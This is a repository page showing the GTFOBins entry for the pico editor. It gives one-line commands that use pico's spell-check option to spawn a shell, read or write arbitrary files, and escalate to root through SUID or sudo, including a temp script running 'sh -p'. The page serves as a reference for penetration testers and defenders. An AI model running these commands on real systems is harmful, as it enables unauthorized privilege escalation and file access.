This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
75eff93c5026bdf6c7e5d3585d90fb6c05735b53
GTFOBins.github.io
/
_gtfobins
/
pico.md
Emilio
75eff93c50
Improve pico shell, suid, and sudo
2019-03-31 12:19:11 +01:00
449 B
Raw
Blame
History
functions
functions
shell
file-write
file-read
suid
sudo
code
pico -s /bin/sh /bin/sh ^T
code
pico file_to_write DATA ^O
code
pico file_to_read
code
TF=$(mktemp) echo '#!/bin/sh -p exec sh -p' > $TF chmod +x $TF ./pico -s $TF /etc/hosts ^T
code
pico -s /bin/sh /bin/sh ^T
Reference in New Issue
View Git Blame
Copy Permalink